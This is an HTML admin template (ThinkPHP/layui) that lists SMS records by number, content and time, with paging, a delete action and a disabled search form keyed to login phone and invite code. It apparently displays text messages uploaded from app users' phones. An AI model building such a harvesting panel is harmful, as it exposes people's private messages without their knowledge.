<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>layui</title>
  <meta name="renderer" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <link rel="stylesheet" href="__PUBLIC__/layui/css/layui.css"  media="all">
  <link rel="stylesheet" href="__PUBLIC__/font-awesome/css/font-awesome.min.css" media="all" />
  <link rel="stylesheet" href="__CSS__/admin.css"  media="all">
  
    <script src="__PUBLIC__/fang/js/jquery.min.js"></script>
  
  
  
   <link href="__PUBLIC__/fang/css/bootstrap.min.css" rel="stylesheet" />
  <link href="__PUBLIC__/fang/css/azzara.min.css" rel="stylesheet" />
  
  
  
  
  <style type="text/css">
/* tooltip */
#tooltip{
  position:absolute;
  border:1px solid #ccc;
  background:#333;
  padding:2px;
  display:none;
  color:#fff;
}
td{
    font-size: 15px !important;
}
.txl{
    border: none!important;
    text-decoration: none!important;
    background: -webkit-linear-gradient(45deg, #42e695, #3bb2b8)!important;
    border-radius: 7px!important;
    color: #fff!important;
    height: 30px!important;
    line-height: 30px!important;
    font-size: 12px!important;
    padding: 0 15px!important;
}
.tcl{
    border: none!important;
    text-decoration: none!important;
    background: -webkit-linear-gradient(45deg, #f54ea2, #ff7676)!important;
    border-radius: 7px!important;
    color: #fff!important;
    height: 30px!important;
    line-height: 30px!important;
     font-size: 12px!important;
     padding: 0 15px!important;
}
.tal{
    border: none!important;
    text-decoration: none!important;
    background: -webkit-linear-gradient(45deg, #4298ff, #1473e6)!important;
    border-radius: 7px!important;
    color: #fff!important;
    height: 30px!important;
    line-height: 30px!important;
     font-size: 12px!important;
     padding: 0 15px!important;
}
.layui-table[lay-size=sm] th{
    font-weight: 600;
    font-size: 14px!important;
}
.layui-table td, .layui-table th, .layui-table-fixed-r, .layui-table-header, .layui-table-page, .layui-table-tips-main, .layui-table-tool, .layui-table-view, .layui-table[lay-skin=line], .layui-table[lay-skin=row]{
        border-width: 0;
}
</style>
</head>
<body style="padding:10px;">
  <div class="tplay-body-div">
    <div class="layui-tab">
      <ul class="layui-tab-title">
        <li class="layui-this">结果显示选择</li>
      </ul>
    </div> 
    <form id="formsubmit" action="{:url('huaxialianmeng2022/appv1/sms')}" method="post">
    
                <label style="display: flex;align-items: baseline;"> 显示
                <select onchange="formsubmit()" name="tiaoshu" style="padding: 0.25rem 0.5rem!important;font-size: .875rem!important; line-height: 1.5;">
                    
                    <option {if $tiaoshu == 20}selected{/if} value="20">20条</option>
                    <option {if $tiaoshu == 100}selected{/if} value="100">100条</option>
                    <option {if $tiaoshu == 1000}selected{/if} value="1000">1000条</option>
                    <option {if $tiaoshu == 5000}selected{/if} value="5000">5000条</option>
                    
                    </select>项结果
                    </label>
                 {if $id > 0}
                 <input type="hidden" name="id" value="{$id}" />
                 {/if}
           </form>         
        <script>
            function formsubmit(){
                $("#formsubmit").submit();
            }
        </script>
    <!--<form class="layui-form serch" action="{:url('admin/appv1/sms')}" method="post">-->
    <!--    <div class="layui-form-item" style="float: left;">-->
    <!--      <div class="layui-input-inline">-->
    <!--        <input type="text" name="keywords" lay-verify="title" autocomplete="off" placeholder="请输入登录手机" class="layui-input layui-btn-sm">-->
    <!--      </div>-->
          
          
          
    <!--      <div class="layui-input-inline">-->
    <!--        <input type="text" name="code" lay-verify="title" autocomplete="off" placeholder="请输入邀请码" class="layui-input layui-btn-sm">-->
    <!--      </div>           -->
    <!--      <div class="layui-input-inline">-->
    <!--        <input type="text" name="smstel" lay-verify="title" autocomplete="off" placeholder="请输入短信号码" class="layui-input layui-btn-sm">-->
    <!--      </div>          -->
    <!--      <div class="layui-input-inline">-->
    <!--        <div class="layui-inline">-->
    <!--          <div class="layui-input-inline">-->
    <!--            <input type="text" class="layui-input" id="create_time" placeholder="短信上传时间" name="create_time">-->
    <!--          </div>-->
    <!--        </div>-->
    <!--      </div>-->
    <!--      <button class="layui-btn layui-btn-danger layui-btn-sm" lay-submit="" lay-filter="serch">立即提交</button>-->
    <!--    </div>-->
    <!--  </form> -->
    <table id="shop-datatables" class="display table table-striped table-hover dataTable no-footer" role="grid" aria-describedby="shop-datatables_info">
      <colgroup>
        <col width="50">
        <col width="600">
        <col width="50">
      </colgroup>
      <thead>
        <tr>
          <th style="border-bottom: 1px solid #000;">短信号码</th>
          <th style="border-bottom: 1px solid #000;">内容</th>
          <th style="border-bottom: 1px solid #000;">时间</th>          
          
        </tr> 
      </thead>
      <tbody>
        {volist name="info" id="vo"}
        <tr>
     
          <td>{$vo.smstel}</td>          
          <td>{$vo.smscontent}</td>          
          <td>{$vo.smstime}</td>          
          
        </tr>
        {/volist}
      </tbody>
    </table>
    <div style="padding:0 20px;">{$info->render()}</div>

    {include file="public/foot"}
    
    <script type="text/javascript">
    $('.delete').click(function(){
      var id = $(this).attr('id');
      layer.confirm('确定要删除此条短信数据？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('huaxialianmeng2022/appv1/smsdelete')}",
          data:{id:id},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
    })
    </script>
  </div>
</body>
</html>
